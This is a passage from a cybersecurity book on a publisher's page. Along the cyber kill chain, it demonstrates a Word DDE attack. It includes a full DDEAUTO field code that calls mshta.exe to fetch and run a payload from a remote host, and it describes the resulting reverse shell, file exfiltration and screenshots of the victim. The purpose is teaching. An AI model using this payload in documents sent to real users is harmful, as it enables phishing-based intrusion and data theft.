Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Free Learning
Arrow right icon
Arrow up icon
GO TO TOP
Hands-On Cybersecurity with Blockchain

You're reading from   Hands-On Cybersecurity with Blockchain Implement DDoS protection, PKI-based identity, 2FA, and DNS security using Blockchain

Arrow left icon
Product type Paperback
Published in Jun 2018
Publisher
ISBN-13 9781788990189
Length 236 pages
Edition 1st Edition
Concepts
Arrow right icon
Author (1):
Arrow left icon
Rajneesh Gupta Rajneesh Gupta
Author Profile Icon Rajneesh Gupta
Rajneesh Gupta
Arrow right icon
View More author details
Toc

Table of Contents (13) Chapters Close

Preface 1. Cyber Threat Landscape and Security Challenges FREE CHAPTER 2. Security Must Evolve 3. Introducing Blockchain and Ethereum 4. Hyperledger – Blockchain for Businesses 5. Blockchain on the CIA Security Triad 6. Deploying PKI-Based Identity with Blockchain 7. Two-Factor Authentication with Blockchain 8. Blockchain-Based DNS Security Platform 9. Deploying Blockchain-Based DDoS Protection 10. Facts about Blockchain and Cyber Security 11. Assessment 12. Other Books You May Enjoy

Live attack execution

In recent attacks, adversaries have run arbitrary code that is executed from a Microsoft Word document without the use of any macros or scripts. This technique is a legitimate Microsoft Office functionality called Dynamic Data Exchange (DDE).

Let's try to see this attack from a cyber kill chain perceptive. The Cyber kill chain is used to describe the attack stages:

  • Reconnaissance: This is a planning phase where the attacker gathers information about something through observation or other detection methods. Cyberattack planning and reconnaissance often include conducting research about the target, usually with open source information gathering tools, such as Google and Shodan, as well as through searches of publicly available data, such as public announcements and social media, company profiles for email, and email harvesting.
  • Weaponization: In this stage, a threat actor plans for the right attack method. The threat actor can even plan to exploit an employee by phishing their email or even with a drive-by download attack. In our example, first we will create a malicious document. In the blank document, go to the Insert | Quick Parts | Field... tab, as shown in the following screenshot:

In the Field names dialog box, select the =(Formula) option to insert our DDE exploit code:

After this, you will see a field in the document with an error: !Unexpected End of Formula. Right-click on that field, and choose the Toggle Field Codes option. You need to do this to craft a DDE Object payload in the text field, which will start the malware or any code of our choice when the document is opened:

In the text field, enter the following code:

DDEAUTO C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe "http://192.168.1.101:8080/8b0HTF3MdgqYqgK

Then, save the document with any name of your choice, such as Financial_Statement:

  • Delivery: Endpoints are the primary means of delivery, whether through a drive-by download from a website, a targeted phishing attack, or an infection through an employee-owned device through a secure virtual private network (VPN).
  • Exploitation and installation: At this stage, the attacker will take advantage of software or human weakness to get the payload to run. In DDE exploitation, adversaries send an email that contains the malicious document. When the user runs that document, the adversaries will get the reverse shell of the victim's machine.

Let's see how the adversaries made the exploits during the weaponization stage and how they gained access to the victim's machine. The adversaries created the malicious payload document and sent it to the victim through an email. Take a look at the following screenshot:

When the user opened the document sent by the adversaries, the payload was executed after one error message, as shown in the following screenshot:

If the user chooses to start the malicious document, the payload will be executed and a Meterpreter session will open:

Action on objectives: This is how the threat actor is successful and gains access to the organization's sensitive files. The adversary tries to exfiltrate the data from the victim's machine. There are many confidential files here that the adversaries try to exfiltrate:

The adversaries take a screenshot of what the victim is doing and try to find out what process is running on the machine, as shown in the following screenshot:

You have been reading a chapter from
Hands-On Cybersecurity with Blockchain
Published in: Jun 2018
Publisher:
ISBN-13: 9781788990189
Register for a free Packt account to unlock a world of extra content!
A free Packt account unlocks extra newsletters, articles, discounted offers, and much more. Start advancing your knowledge today.
Unlock this book and the full library FREE for 7 days
Get unlimited access to 7000+ expert-authored eBooks and videos courses covering every tech area you can think of
Renews at $19.99/month. Cancel anytime
Banner background image